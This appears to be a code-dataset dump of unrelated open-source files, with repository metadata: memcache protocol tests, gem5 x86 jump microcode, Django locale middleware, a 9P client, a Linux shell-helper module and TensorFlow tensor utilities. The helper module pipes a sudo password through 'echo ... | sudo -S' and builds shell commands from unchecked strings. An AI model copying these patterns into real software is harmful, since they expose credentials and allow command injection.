call('cas key1 0 0 1 %d\r\na\r\n' % (self.getItemVersion('key1') + 1))
set_count += 1
get_count += 1
get_hits += 1
cas_badval += 1
call('delete key1\r\n')
delete_hits += 1
call('delete key1\r\n')
delete_misses += 1
call('incr num 1\r\n')
incr_misses += 1
call('decr num 1\r\n')
decr_misses += 1
call('set num 0 0 1\r\n0\r\n')
set_count += 1
total_items += 1
call('incr num 1\r\n')
incr_hits += 1
call('decr num 1\r\n')
decr_hits += 1
self.flush()
flush_count += 1
self.assertEquals(get_count, int(self.getStat('cmd_get')))
self.assertEquals(set_count, int(self.getStat('cmd_set')))
self.assertEquals(flush_count, int(self.getStat('cmd_flush')))
self.assertEquals(total_items, int(self.getStat('total_items')))
self.assertEquals(get_hits, int(self.getStat('get_hits')))
self.assertEquals(get_misses, int(self.getStat('get_misses')))
self.assertEquals(cas_misses, int(self.getStat('cas_misses')))
self.assertEquals(cas_hits, int(self.getStat('cas_hits')))
self.assertEquals(cas_badval, int(self.getStat('cas_badval')))
self.assertEquals(delete_misses, int(self.getStat('delete_misses')))
self.assertEquals(delete_hits, int(self.getStat('delete_hits')))
self.assertEquals(0, int(self.getStat('curr_items')))
self.assertEquals(curr_connections, int(self.getStat('curr_connections')))
self.assertEquals(incr_misses, int(self.getStat('incr_misses')))
self.assertEquals(incr_hits, int(self.getStat('incr_hits')))
self.assertEquals(decr_misses, int(self.getStat('decr_misses')))
self.assertEquals(decr_hits, int(self.getStat('decr_hits')))
def test_incr(self):
self.assertEqual(call('incr key 0\r\n'), b'NOT_FOUND\r\n')
self.assertEqual(call('set key 0 0 1\r\n0\r\n'), b'STORED\r\n')
self.assertEqual(call('incr key 0\r\n'), b'0\r\n')
self.assertEqual(call('get key\r\n'), b'VALUE key 0 1\r\n0\r\nEND\r\n')
self.assertEqual(call('incr key 1\r\n'), b'1\r\n')
self.assertEqual(call('incr key 2\r\n'), b'3\r\n')
self.assertEqual(call('incr key %d\r\n' % (pow(2, 64) - 1)), b'2\r\n')
self.assertEqual(call('incr key %d\r\n' % (pow(2, 64) - 3)), b'18446744073709551615\r\n')
self.assertRegexpMatches(call('incr key 1\r\n').decode(), r'0(\w+)?\r\n')
self.assertEqual(call('set key 0 0 2\r\n1 \r\n'), b'STORED\r\n')
self.assertEqual(call('incr key 1\r\n'), b'2\r\n')
self.assertEqual(call('set key 0 0 2\r\n09\r\n'), b'STORED\r\n')
self.assertEqual(call('incr key 1\r\n'), b'10\r\n')
def test_decr(self):
self.assertEqual(call('decr key 0\r\n'), b'NOT_FOUND\r\n')
self.assertEqual(call('set key 0 0 1\r\n7\r\n'), b'STORED\r\n')
self.assertEqual(call('decr key 1\r\n'), b'6\r\n')
self.assertEqual(call('get key\r\n'), b'VALUE key 0 1\r\n6\r\nEND\r\n')
self.assertEqual(call('decr key 6\r\n'), b'0\r\n')
self.assertEqual(call('decr key 2\r\n'), b'0\r\n')
self.assertEqual(call('set key 0 0 2\r\n20\r\n'), b'STORED\r\n')
self.assertRegexpMatches(call('decr key 11\r\n').decode(), r'^9( )?\r\n$')
self.assertEqual(call('set key 0 0 3\r\n100\r\n'), b'STORED\r\n')
self.assertRegexpMatches(call('decr key 91\r\n').decode(), r'^9( )?\r\n$')
self.assertEqual(call('set key 0 0 2\r\n1 \r\n'), b'STORED\r\n')
self.assertEqual(call('decr key 1\r\n'), b'0\r\n')
self.assertEqual(call('set key 0 0 2\r\n09\r\n'), b'STORED\r\n')
self.assertEqual(call('decr key 1\r\n'), b'8\r\n')
def test_incr_and_decr_on_invalid_input(self):
error_msg = b'CLIENT_ERROR cannot increment or decrement non-numeric value\r\n'
for cmd in ['incr', 'decr']:
for value in ['', '-1', 'a', '0x1', '18446744073709551616']:
self.assertEqual(call('set key 0 0 %d\r\n%s\r\n' % (len(value), value)), b'STORED\r\n')
prev = call('get key\r\n')
self.assertEqual(call(cmd + ' key 1\r\n'), error_msg, "cmd=%s, value=%s" % (cmd, value))
self.assertEqual(call('get key\r\n'), prev)
self.delete('key')
def wait_for_memcache_tcp(timeout=4):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
timeout_at = time.time() + timeout
while True:
if time.time() >= timeout_at:
raise TimeoutError()
try:
s.connect(server_addr)
s.close()
break
except ConnectionRefusedError:
time.sleep(0.1)
def wait_for_memcache_udp(timeout=4):
timeout_at = time.time() + timeout
while True:
if time.time() >= timeout_at:
raise TimeoutError()
try:
udp_call('version\r\n', timeout=0.2)
break
except socket.timeout:
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="memcache protocol tests")
parser.add_argument('--server', '-s', action="store", help="server adddress in <host>:<port> format", default="localhost:11211")
parser.add_argument('--udp', '-U', action="store_true", help="Use UDP protocol")
parser.add_argument('--fast', action="store_true", help="Run only fast tests")
args = parser.parse_args()
host, port = args.server.split(':')
server_addr = (host, int(port))
if args.udp:
call = udp_call
wait_for_memcache_udp()
else:
call = tcp_call
wait_for_memcache_tcp()
runner = unittest.TextTestRunner()
loader = unittest.TestLoader()
suite = unittest.TestSuite()
suite.addTest(loader.loadTestsFromTestCase(TestCommands))
if args.udp:
suite.addTest(loader.loadTestsFromTestCase(UdpSpecificTests))
else:
suite.addTest(loader.loadTestsFromTestCase(TcpSpecificTests))
result = runner.run(suite)
if not result.wasSuccessful():
sys.exit(1)
| apache-2.0 |
danielpalomino/gem5 | src/arch/x86/isa/insts/general_purpose/control_transfer/jump.py | 40 | 5389 | # Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop JMP_I
{
# Make the default data size of jumps 64 bits in 64 bit mode
.adjust_env oszIn64Override
rdip t1
limm t2, imm
wrip t1, t2
};
def macroop JMP_R
{
# Make the default data size of jumps 64 bits in 64 bit mode
.adjust_env oszIn64Override
wripi reg, 0
};
def macroop JMP_M
{
# Make the default data size of jumps 64 bits in 64 bit mode
.adjust_env oszIn64Override
ld t1, seg, sib, disp
wripi t1, 0
};
def macroop JMP_P
{
# Make the default data size of jumps 64 bits in 64 bit mode
.adjust_env oszIn64Override
rdip t7
ld t1, seg, riprel, disp
wripi t1, 0
};
def macroop JMP_FAR_M
{
limm t1, 0, dataSize=8
limm t2, 0, dataSize=8
lea t1, seg, sib, disp, dataSize=asz
ld t2, seg, [1, t0, t1], dsz
ld t1, seg, [1, t0, t1]
br rom_label("jmpFarWork")
};
def macroop JMP_FAR_P
{
limm t1, 0, dataSize=8
limm t2, 0, dataSize=8
rdip t7, dataSize=asz
lea t1, seg, riprel, disp, dataSize=asz
ld t2, seg, [1, t0, t1], dsz
ld t1, seg, [1, t0, t1]
br rom_label("jmpFarWork")
};
def macroop JMP_FAR_I
{
# Put the whole far pointer into a register.
limm t2, imm, dataSize=8
# Figure out the width of the offset.
limm t3, dsz, dataSize=8
slli t3, t3, 3, dataSize=8
# Get the offset into t1.
mov t1, t0, t2
# Get the selector into t2.
srl t2, t2, t3, dataSize=8
mov t2, t0, t2, dataSize=2
br rom_label("jmpFarWork")
};
def rom
{
extern jmpFarWork:
# t1 has the offset and t2 has the new selector.
# This is intended to run in protected mode.
andi t0, t2, 0xFC, flags=(EZF,), dataSize=2
fault "new GeneralProtection(0)", flags=(CEZF,)
andi t3, t2, 0xF8, dataSize=8
andi t0, t2, 0x4, flags=(EZF,), dataSize=2
br rom_local_label("farJmpGlobalDescriptor"), flags=(CEZF,)
ld t4, tsl, [1, t0, t3], dataSize=8, addressSize=8, atCPL0=True
br rom_local_label("farJmpProcessDescriptor")
farJmpGlobalDescriptor:
ld t4, tsg, [1, t0, t3], dataSize=8, addressSize=8, atCPL0=True
farJmpProcessDescriptor:
rcri t0, t4, 13, flags=(ECF,), dataSize=2
br rom_local_label("farJmpSystemDescriptor"), flags=(nCECF,)
chks t2, t4, CSCheck, dataSize=8
wrdl cs, t4, t2
wrsel cs, t2
wrip t0, t1
eret
farJmpSystemDescriptor:
panic "Far jumps to system descriptors aren't implemented"
eret
};
def macroop JMP_FAR_REAL_M
{
lea t1, seg, sib, disp, dataSize=asz
ld t2, seg, [1, t0, t1], dsz
ld t1, seg, [1, t0, t1]
zexti t3, t1, 15, dataSize=8
slli t3, t3, 4, dataSize=8
wrsel cs, t1, dataSize=2
wrbase cs, t3
wrip t0, t2, dataSize=asz
};
def macroop JMP_FAR_REAL_P
{
panic "Real mode far jump executed in 64 bit mode!"
};
def macroop JMP_FAR_REAL_I
{
# Put the whole far pointer into a register.
limm t2, imm, dataSize=8
# Figure out the width of the offset.
limm t3, dsz, dataSize=8
slli t3, t3, 3, dataSize=8
# Get the selector into t1.
sll t1, t2, t3, dataSize=8
mov t1, t0, t1, dataSize=2
# And get the offset into t2
mov t2, t0, t2
slli t3, t3, 4, dataSize=8
wrsel cs, t1, dataSize=2
wrbase cs, t3
wrip t0, t2, dataSize=asz
};
'''
| bsd-3-clause |
gmacchi93/serverInfoParaguay | apps/venv/lib/python2.7/site-packages/django/middleware/locale.py | 85 | 3156 | "This is the locale selecting middleware that will look at accept headers"
from django.conf import settings
from django.core.urlresolvers import (
LocaleRegexURLResolver, get_resolver, get_script_prefix, is_valid_path,
)
from django.http import HttpResponseRedirect
from django.utils import translation
from django.utils.cache import patch_vary_headers
class LocaleMiddleware(object):
"""
This is a very simple middleware that parses a request
and decides what translation object to install in the current
thread context. This allows pages to be dynamically
translated to the language the user desires (if the language
is available, of course).
"""
response_redirect_class = HttpResponseRedirect
def __init__(self):
self._is_language_prefix_patterns_used = False
for url_pattern in get_resolver(None).url_patterns:
if isinstance(url_pattern, LocaleRegexURLResolver):
self._is_language_prefix_patterns_used = True
break
def process_request(self, request):
check_path = self.is_language_prefix_patterns_used()
language = translation.get_language_from_request(
request, check_path=check_path)
translation.activate(language)
request.LANGUAGE_CODE = translation.get_language()
def process_response(self, request, response):
language = translation.get_language()
language_from_path = translation.get_language_from_path(request.path_info)
if (response.status_code == 404 and not language_from_path
and self.is_language_prefix_patterns_used()):
urlconf = getattr(request, 'urlconf', None)
language_path = '/%s%s' % (language, request.path_info)
path_valid = is_valid_path(language_path, urlconf)
if (not path_valid and settings.APPEND_SLASH
and not language_path.endswith('/')):
path_valid = is_valid_path("%s/" % language_path, urlconf)
if path_valid:
script_prefix = get_script_prefix()
language_url = "%s://%s%s" % (
request.scheme,
request.get_host(),
# insert language after the script prefix and before the
# rest of the URL
request.get_full_path().replace(
script_prefix,
'%s%s/' % (script_prefix, language),
1
)
)
return self.response_redirect_class(language_url)
if not (self.is_language_prefix_patterns_used()
and language_from_path):
patch_vary_headers(response, ('Accept-Language',))
if 'Content-Language' not in response:
response['Content-Language'] = language
return response
def is_language_prefix_patterns_used(self):
"""
Returns `True` if the `LocaleRegexURLResolver` is used
at root level of the urlpatterns, else it returns `False`.
"""
return self._is_language_prefix_patterns_used
| apache-2.0 |
bwhmather/wmii | alternative_wmiircs/python/pyxp/client.py | 9 | 9838 | # Copyright (C) 2009 Kris Maglione
import operator
import os
import re
import sys
from threading import *
import traceback
import pyxp
from pyxp import fcall, fields
from pyxp.mux import Mux
from pyxp.types import *
if os.environ.get('NAMESPACE', None):
namespace = os.environ['NAMESPACE']
else:
try:
namespace = '/tmp/ns.%s.%s' % (
os.environ['USER'],
re.sub(r'\.0$', '', os.environ['DISPLAY']))
except Exception:
pass
NAMESPACE = namespace
OREAD = 0x00
OWRITE = 0x01
ORDWR = 0x02
OEXEC = 0x03
OEXCL = 0x04
OTRUNC = 0x10
OREXEC = 0x20
ORCLOSE = 0x40
OAPPEND = 0x80
ROOT_FID = 0
class ProtocolException(Exception):
pass
class RPCError(Exception):
pass
class Client(object):
ROOT_FID = 0
@staticmethod
def respond(callback, data, exc=None, tb=None):
if hasattr(callback, 'func_code'):
callback(*(data, exc, tb)[0:callback.func_code.co_argcount])
elif callable(callback):
callback(data)
def __enter__(self):
return self
def __exit__(self, *args):
self._cleanup()
def __init__(self, conn=None, namespace=None, root=None):
if not conn and namespace:
conn = 'unix!%s/%s' % (NAMESPACE, namespace)
try:
self.lastfid = ROOT_FID
self.fids = set()
self.lock = RLock()
def process(data):
return fcall.Fcall.unmarshall(data)[1]
self.mux = Mux(conn, process, maxtag=256)
resp = self._dorpc(fcall.Tversion(version=pyxp.VERSION, msize=65535))
if resp.version != pyxp.VERSION:
raise ProtocolException, "Can't speak 9P version '%s'" % resp.version
self.msize = resp.msize
self._dorpc(fcall.Tattach(fid=ROOT_FID, afid=fcall.NO_FID,
uname=os.environ['USER'], aname=''))
if root:
path = self._splitpath(root)
resp = self._dorpc(fcall.Twalk(fid=ROOT_FID,
newfid=ROOT_FID,
wname=path))
except Exception:
traceback.print_exc(sys.stdout)
if getattr(self, 'mux', None):
self.mux.fd.close()
raise
def _cleanup(self):
try:
for f in self.files:
f.close()
finally:
self.mux.fd.close()
self.mux = None
def _dorpc(self, req, callback=None, error=None):
def doresp(resp):
if isinstance(resp, fcall.Rerror):
raise RPCError, "%s[%d] RPC returned error: %s" % (
req.__class__.__name__, resp.tag, resp.ename)
if req.type != resp.type ^ 1:
raise ProtocolException, "Missmatched RPC message types: %s => %s" % (
req.__class__.__name__, resp.__class__.__name__)
return resp
def next(mux, resp):
try:
res = doresp(resp)
except Exception, e:
self.respond(error or callback, None, e, None)
else:
self.respond(callback, res)
if not callback:
return doresp(self.mux.rpc(req))
self.mux.rpc(req, next)
def _splitpath(self, path):
if isinstance(path, list):
return path
return [v for v in path.split('/') if v != '']
def _getfid(self):
with self.lock:
if self.fids:
return self.fids.pop()
self.lastfid += 1
return self.lastfid
def _putfid(self, fid):
with self.lock:
self.fids.add(fid)
def _aclunk(self, fid, callback=None):
def next(resp, exc, tb):
if resp:
self._putfid(fid)
self.respond(callback, resp, exc, tb)
self._dorpc(fcall.Tclunk(fid=fid), next)
def _clunk(self, fid):
try:
self._dorpc(fcall.Tclunk(fid=fid))
finally:
self._putfid(fid)
def _walk(self, path):
fid = self._getfid()
ofid = ROOT_FID
while True:
self._dorpc(fcall.Twalk(fid=ofid, newfid=fid,
wname=path[0:fcall.MAX_WELEM]))
path = path[fcall.MAX_WELEM:]
ofid = fid
if len(path) == 0:
break
@apply
class Res:
def __enter__(res):
return fid
def __exit__(res, exc_type, exc_value, traceback):
if exc_type:
self._clunk(fid)
return Res
_file = property(lambda self: File)
def _open(self, path, mode, fcall, origpath=None):
resp = None
with self._walk(path) as nfid:
fid = nfid
fcall.fid = fid
resp = self._dorpc(fcall)
def cleanup():
self._aclunk(fid)
file = self._file(self, origpath or '/'.join(path), resp, fid, mode, cleanup)
return file
def open(self, path, mode=OREAD):
path = self._splitpath(path)
return self._open(path, mode, fcall.Topen(mode=mode))
def create(self, path, mode=OREAD, perm=0):
path = self._splitpath(path)
name = path.pop()
return self._open(path, mode, fcall.Tcreate(mode=mode, name=name, perm=perm),
origpath='/'.join(path + [name]))
def remove(self, path):
path = self._splitpath(path)
with self._walk(path) as fid:
self._dorpc(fcall.Tremove(fid=fid))
def stat(self, path):
path = self._splitpath(path)
try:
with self._walk(path) as fid:
resp = self._dorpc(fcall.Tstat(fid= fid))
st = resp.stat
self._clunk(fid)
return st
except RPCError:
return None
def read(self, path, *args, **kwargs):
with self.open(path) as f:
return f.read(*args, **kwargs)
def readlines(self, path, *args, **kwargs):
with self.open(path) as f:
for l in f.readlines(*args, **kwargs):
yield l
def readdir(self, path, *args, **kwargs):
with self.open(path) as f:
for s in f.readdir(*args, **kwargs):
yield s
def write(self, path, *args, **kwargs):
with self.open(path, OWRITE) as f:
return f.write(*args, **kwargs)
class File(object):
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def __init__(self, client, path, fcall, fid, mode, cleanup):
self.lock = RLock()
self.client = client
self.path = path
self.fid = fid
self._cleanup = cleanup
self.mode = mode
self.iounit = fcall.iounit
self.qid = fcall.qid
self.closed = False
self.offset = 0
def __del__(self):
if not self.closed:
self._cleanup()
def _dorpc(self, fcall, async=None, error=None):
if hasattr(fcall, 'fid'):
fcall.fid = self.fid
return self.client._dorpc(fcall, async, error)
def stat(self):
resp = self._dorpc(fcall.Tstat())
return resp.stat
def read(self, count=None, offset=None, buf=''):
if count is None:
count = self.iounit
res = []
with self.lock:
offs = self.offset
if offset is not None:
offs = offset
while count > 0:
n = min(count, self.iounit)
count -= n
resp = self._dorpc(fcall.Tread(offset=offs, count=n))
data = resp.data
offs += len(data)
res.append(data)
if len(data) < n:
break
if offset is None:
self.offset = offs
return ''.join(res)
def readlines(self):
last = None
while True:
data = self.read()
if not data:
break
lines = data.split('\n')
if last:
lines[0] = last + lines[0]
last = None
for i in range(0, len(lines) - 1):
yield lines[i]
last = lines[-1]
if last:
yield last
def write(self, data, offset=None):
if offset is None:
offset = self.offset
off = 0
with self.lock:
offs = self.offset
if offset is not None:
offs = offset
while off < len(data):
n = min(len(data), self.iounit)
resp = self._dorpc(fcall.Twrite(offset=offs,
data=data[off:off+n]))
off += resp.count
offs += resp.count
if resp.count < n:
break
if offset is None:
self.offset = offs
return off
def readdir(self):
if not self.qid.type & Qid.QTDIR:
raise Exception, "Can only call readdir on a directory"
off = 0
while True:
data = self.read(self.iounit, off)
if not data:
break
off += len(data)
for s in Stat.unmarshall_list(data):
yield s
def close(self):
assert not self.closed
self.closed = True
try:
self._cleanup()
except:
pass
self.tg = None
self.fid = None
self.client = None
self.qid = None
def remove(self):
try:
self._dorpc(fcall.Tremove())
finally:
self.close()
# vim:se sts=4 sw=4 et:
| mit |
furkantokac/Faunus | src/utilinux.py | 1 | 3351 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import subprocess, os, socket
def validate_ip(addr):
try:
socket.inet_aton(addr)
return True # legal
except socket.error:
return False # Not legal
def get_stdout(pi):
result = pi.communicate()
if len(result[0])>0:
return result[0]
else:
return result[1] # some error has occured
def killall(process_name):
counter = 0
pid = is_process_running(process_name)
while pid!=0:
execute_shell('kill '+str(pid))
pid = is_process_running(process_name)
counter += 1
return counter
def execute_shell(command, error=''):
return execute(command, wait=True, shellexec=True, errorstring=error)
def execute_shell_root(command, sudo_pwd='', error=''):
command = "echo "+str(sudo_pwd)+" | sudo -S "+command
return execute(command, wait=True, shellexec=True, errorstring=error)
def execute(command='', wait=True, shellexec=False, errorstring='', ags=None):
try:
if (shellexec):
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
p = subprocess.Popen(args=ags)
if wait:
p.wait()
result = get_stdout(p)
return result
else:
return p
except subprocess.CalledProcessError as e:
print('Error occured : '+errorstring)
return errorstring
except Exception as ea:
print('Exception occured : '+ea.message)
return errorstring
def is_process_running(name):
cmd = 'ps aux |grep '+name+' |grep -v grep'
s = execute_shell(cmd)
if len(s)==0:
return 0
else:
t = s.split()
return int(t[1])
def check_dependency(packet_name):
if len(check_sysfile(packet_name))==0:
print(packet_name+" executable not found. Make sure you have installed "+packet_name)
return False
return True
def check_sysfile(filename):
if os.path.exists('/usr/sbin/'+filename):
return '/usr/sbin/'+filename
elif os.path.exists('/sbin/'+filename):
return '/sbin/'+filename
else:
return ''
def get_sysctl(setting, sudo_pwd):
result = execute_shell_root('sysctl '+setting, sudo_pwd).decode("utf-8")
if '=' in result:
return result.split('=')[1].lstrip()
else:
return result
def set_sysctl(setting, value, sudo_pwd):
return execute_shell_root('sysctl -w '+setting+'='+value, sudo_pwd).decode("utf-8")
def interface_iw(name):
response = execute_shell('iwconfig').decode("utf-8")
lines = response.splitlines()
for line in lines:
if not line.startswith(' ') and len(line)>0:
text = line.split(' ')[0]
if line.startswith(name):
return text
return False
def interface_if(name):
response = execute_shell('ifconfig').decode("utf-8")
lines = response.splitlines()
for line in lines:
if not line.startswith(' ') and len(line)>0:
text = line.split(' ')[0]
if text.startswith(name):
return text
return False
def check_eth_connected(sudo_pwd):
response = execute_shell_root("ethtool eth0 | grep detected:", sudo_pwd).decode("utf-8")
if "yes" in response:
return True
return False | mit |
zycdragonball/tensorflow | tensorflow/contrib/framework/python/framework/tensor_util.py | 48 | 10771 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tensor utility functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
__all__ = [
'assert_same_float_dtype',
'assert_scalar',
'assert_scalar_int',
'convert_to_tensor_or_sparse_tensor',
'is_tensor',
'reduce_sum_n',
'remove_squeezable_dimensions',
'with_shape',
'with_same_shape']
# Temporary for backwards compatibility
is_tensor = tensor_util.is_tensor
assert_same_float_dtype = check_ops.assert_same_float_dtype
assert_scalar = check_ops.assert_scalar
convert_to_tensor_or_sparse_tensor = (
sparse_tensor.convert_to_tensor_or_sparse_tensor)
def reduce_sum_n(tensors, name=None):
"""Reduce tensors to a scalar sum.
This reduces each tensor in `tensors` to a scalar via `tf.reduce_sum`, then
adds them via `tf.add_n`.
Args:
tensors: List of tensors, all of the same numeric type.
name: Tensor name, and scope for all other ops.
Returns:
Total loss tensor, or None if no losses have been configured.
Raises:
ValueError: if `losses` is missing or empty.
"""
if not tensors:
raise ValueError('No tensors provided.')
with ops.name_scope(name, 'reduce_sum_n', tensors) as name_scope:
tensors = [
math_ops.reduce_sum(t, name='%s/sum' % t.op.name) for t in tensors]
if len(tensors) == 1:
return tensors[0]
return math_ops.add_n(tensors, name=name_scope)
def remove_squeezable_dimensions(predictions, labels, name=None):
"""Squeeze last dim if ranks of `predictions` and `labels` differ by 1.
This will use static shape if available. Otherwise, it will add graph
operations, which could result in a performance hit.
Args:
predictions: Predicted values, a `Tensor` of arbitrary dimensions.
labels: Label values, a `Tensor` whose dimensions match `predictions`.
name: Name of the op.
Returns:
Tuple of `predictions` and `labels`, possibly with last dim squeezed.
"""
with ops.name_scope(name, 'remove_squeezable_dimensions',
[predictions, labels]):
predictions = ops.convert_to_tensor(predictions)
labels = ops.convert_to_tensor(labels)
predictions_shape = predictions.get_shape()
predictions_rank = predictions_shape.ndims
labels_shape = labels.get_shape()
labels_rank = labels_shape.ndims
if (labels_rank is not None) and (predictions_rank is not None):
# Use static rank.
rank_diff = predictions_rank - labels_rank
if rank_diff == -1:
labels = array_ops.squeeze(labels, [-1])
elif rank_diff == 1:
predictions = array_ops.squeeze(predictions, [-1])
return predictions, labels
# Use dynamic rank.
rank_diff = array_ops.rank(predictions) - array_ops.rank(labels)
if (predictions_rank is None) or (
predictions_shape.dims[-1].is_compatible_with(1)):
predictions = control_flow_ops.cond(
math_ops.equal(1, rank_diff),
lambda: array_ops.squeeze(predictions, [-1]),
lambda: predictions)
if (labels_rank is None) or (
labels_shape.dims[-1].is_compatible_with(1)):
labels = control_flow_ops.cond(
math_ops.equal(-1, rank_diff),
lambda: array_ops.squeeze(labels, [-1]),
lambda: labels)
return predictions, labels
def _all_equal(tensor0, tensor1):
with ops.name_scope('all_equal', values=[tensor0, tensor1]) as scope:
return math_ops.reduce_all(
math_ops.equal(tensor0, tensor1, name='equal'), name=scope)
def _is_rank(expected_rank, actual_tensor):
"""Returns whether actual_tensor's rank is expected_rank.
Args:
expected_rank: Integer defining the expected rank, or tensor of same.
actual_tensor: Tensor to test.
Returns:
New tensor.
"""
with ops.name_scope('is_rank', values=[actual_tensor]) as scope:
expected = ops.convert_to_tensor(expected_rank, name='expected')
actual = array_ops.rank(actual_tensor, name='actual')
return math_ops.equal(expected, actual, name=scope)
def _is_shape(expected_shape, actual_tensor, actual_shape=None):
"""Returns whether actual_tensor's shape is expected_shape.
Args:
expected_shape: Integer list defining the expected shape, or tensor of same.
actual_tensor: Tensor to test.
actual_shape: Shape of actual_tensor, if we already have it.
Returns:
New tensor.
"""
with ops.name_scope('is_shape', values=[actual_tensor]) as scope:
is_rank = _is_rank(array_ops.size(expected_shape), actual_tensor)
if actual_shape is None:
actual_shape = array_ops.shape(actual_tensor, name='actual')
shape_equal = _all_equal(
ops.convert_to_tensor(expected_shape, name='expected'),
actual_shape)
return math_ops.logical_and(is_rank, shape_equal, name=scope)
def _assert_shape_op(expected_shape, actual_tensor):
"""Asserts actual_tensor's shape is expected_shape.
Args:
expected_shape: List of integers defining the expected shape, or tensor of
same.
actual_tensor: Tensor to test.
Returns:
New assert tensor.
"""
with ops.name_scope('assert_shape', values=[actual_tensor]) as scope:
actual_shape = array_ops.shape(actual_tensor, name='actual')
is_shape = _is_shape(expected_shape, actual_tensor, actual_shape)
return control_flow_ops.Assert(
is_shape, [
'Wrong shape for %s [expected] [actual].' % actual_tensor.name,
expected_shape,
actual_shape
], name=scope)
def with_same_shape(expected_tensor, tensor):
"""Assert tensors are the same shape, from the same graph.
Args:
expected_tensor: Tensor with expected shape.
tensor: Tensor of actual values.
Returns:
Tuple of (actual_tensor, label_tensor), possibly with assert ops added.
"""
with ops.name_scope('%s/' % tensor.op.name, values=[expected_tensor, tensor]):
tensor_shape = expected_tensor.get_shape()
expected_shape = (
tensor_shape.as_list() if tensor_shape.is_fully_defined()
else array_ops.shape(expected_tensor, name='expected_shape'))
return with_shape(expected_shape, tensor)
def with_shape(expected_shape, tensor):
"""Asserts tensor has expected shape.
If tensor shape and expected_shape, are fully defined, assert they match.
Otherwise, add assert op that will validate the shape when tensor is
evaluated, and set shape on tensor.
Args:
expected_shape: Expected shape to assert, as a 1D array of ints, or tensor
of same.
tensor: Tensor whose shape we're validating.
Returns:
tensor, perhaps with a dependent assert operation.
Raises:
ValueError: if tensor has an invalid shape.
"""
if isinstance(tensor, sparse_tensor.SparseTensor):
raise ValueError('SparseTensor not supported.')
# Shape type must be 1D int32.
if tensor_util.is_tensor(expected_shape):
if expected_shape.dtype.base_dtype != dtypes.int32:
raise ValueError(
'Invalid dtype %s for shape %s expected of tensor %s.' % (
expected_shape.dtype, expected_shape, tensor.name))
if isinstance(expected_shape, (list, tuple)):
if not expected_shape:
expected_shape = np.asarray([], dtype=np.int32)
else:
np_expected_shape = np.asarray(expected_shape)
expected_shape = (
np.asarray(expected_shape, dtype=np.int32)
if np_expected_shape.dtype == np.int64 else np_expected_shape)
if isinstance(expected_shape, np.ndarray):
if expected_shape.ndim > 1:
raise ValueError(
'Invalid rank %s for shape %s expected of tensor %s.' % (
expected_shape.ndim, expected_shape, tensor.name))
if expected_shape.dtype != np.int32:
raise ValueError(
'Invalid dtype %s for shape %s expected of tensor %s.' % (
expected_shape.dtype, expected_shape, tensor.name))
actual_shape = tensor.get_shape()
if (not actual_shape.is_fully_defined()
or tensor_util.is_tensor(expected_shape)):
with ops.name_scope('%s/' % tensor.op.name, values=[tensor]):
if (not tensor_util.is_tensor(expected_shape)
and (len(expected_shape) < 1)):
# TODO(irving): Remove scalar special case
return array_ops.reshape(tensor, [])
with ops.control_dependencies([_assert_shape_op(expected_shape, tensor)]):
result = array_ops.identity(tensor)
if not tensor_util.is_tensor(expected_shape):
result.set_shape(expected_shape)
return result
if (not tensor_util.is_tensor(expected_shape) and
not actual_shape.is_compatible_with(expected_shape)):
if (len(expected_shape) < 1) and actual_shape.is_compatible_with([1]):
# TODO(irving): Remove scalar special case.
with ops.name_scope('%s/' % tensor.op.name, values=[tensor]):
return array_ops.reshape(tensor, [])
raise ValueError('Invalid shape for tensor %s, expected %s, got %s.' % (
tensor.name, expected_shape, actual_shape))
return tensor
def assert_scalar_int(tensor, name=None):
"""Assert `tensor` is 0-D, of type `tf.int32` or `tf.int64`.
Args:
tensor: `Tensor` to test.
